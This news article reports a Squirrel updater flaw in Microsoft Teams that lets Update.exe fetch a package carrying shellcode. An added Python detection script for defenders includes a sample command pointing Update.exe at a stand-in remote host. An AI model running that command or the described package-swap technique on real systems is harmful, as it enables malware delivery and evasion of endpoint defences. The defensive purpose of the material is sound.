
Squirrel Exploit Leaves Microsoft Teams Vulnerable to Privilege Escalation

Microsoft’s collaboration platform Teams has a vulnerability that lets any user insert malicious code into the application, handing over control of it while escalating privileges.

Researchers have found that the Microsoft Teams vulnerability can be triggered by running an update command in the desktop version of the application.

(Microsoft Teams is a collection of enterprise collaboration tools, comprising Office 365, a SharePoint Online site and a document library for storing team files.)

This issue also affects the desktop versions of WhatsApp, UiPath and GitHub; however, in their case the vulnerability can only be used to download a payload.


All of these applications use the open source project Squirrel, which handles their installation and update routines, while the NuGet package manager is used to manage the package files.

The issue has yet to be patched. The security researcher who disclosed it to Microsoft, Reegun Richard, had planned to hold off publishing until a fix was available, but with two other security researchers having also identified and published exploits, he said he was detailing the issue to help blue teamers.

Richard discovered that he could execute malicious code from Microsoft’s legitimate binary, making this a living-off-the-land attack.

Doing so requires no special privileges, and if the application has control of system files, access and privileges can be escalated with ease.

Microsoft Teams Vulnerability

Using the vulnerability, a threat actor can trick the application’s update function into downloading whatever malicious code they wish, via Microsoft’s own binary.

Essentially, the attack involves extracting any nupkg package and inserting into it a shellcode file named ‘squirrel.exe’.

Once a threat actor has created a suitable package, they can go into the target application folder and run update.exe; the application will then automatically “update”, downloading the malicious package containing the shellcode into the ‘packages’ folder.

Richard wrote in a security blog update on the vulnerability that: “I decided finally to make it public since I spent most of the time in this and without fixing this, the adversaries/insiders likely use this technique for EDR/IDS evasion, So this post will make the blueteam-defense team aware of this situation.”
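For the blue teamers Richard refers to, the following is an added example (not code from the article or from Richard’s research): it triages constructed process-creation records for Update.exe launches whose update feed points at an unexpected host, or whose parent process is not one of the usual launchers. The `--update`/`--download` flag syntax, the allowlisted host, the expected-parent set and the sample paths are all assumptions to be tuned against local telemetry.

```python
import re
from urllib.parse import urlparse

# Hosts a sanctioned update is expected to reach. Placeholder value (assumed):
# replace with the hosts your own telemetry shows Update.exe contacting legitimately.
ALLOWED_UPDATE_HOSTS = {"updates.example.invalid"}

# Processes that normally launch Update.exe (assumed: the app itself, or the shell
# that starts it at logon). Any other parent is a heuristic signal, not proof.
EXPECTED_PARENTS = {"teams.exe", "explorer.exe"}

# Squirrel's Update.exe takes --update=<url> / --download=<url> (assumed syntax;
# check it against the Update.exe build deployed in your environment).
_FEED_RE = re.compile(r'--(?:update|download)[= ]"?([^\s"]+)', re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(event: dict, allowed_hosts=ALLOWED_UPDATE_HOSTS) -> list[str]:
    """Return reasons this process-creation record deserves a look (empty if none)."""
    reasons = []
    if basename(event["image"]) != "update.exe":
        return reasons
    match = _FEED_RE.search(event["cmdline"])
    if match:
        host = (urlparse(match.group(1)).hostname or "").lower()
        if host not in allowed_hosts:
            reasons.append(f"update feed points at unexpected host: {host or match.group(1)}")
    parent = basename(event["parent"])
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"Update.exe launched by unexpected parent: {parent}")
    return reasons


# Constructed sample records in a Sysmon-like shape (not real telemetry; paths are made up).
SAMPLE_EVENTS = [
    {"image": r"C:\Users\u\AppData\Local\Teams\Update.exe",
     "cmdline": r'Update.exe --processStart "Teams.exe"',
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Users\u\AppData\Local\Teams\Update.exe",
     "cmdline": r"Update.exe --update=http://203.0.113.7/packages",
     "parent": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for reason in triage(ev):
            print(f"{ev['cmdline']}: {reason}")
```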

Microsoft has been contacted for comment.

This article is from the CBROnline archive: some formatting and images may not be present.

CBR Staff Writer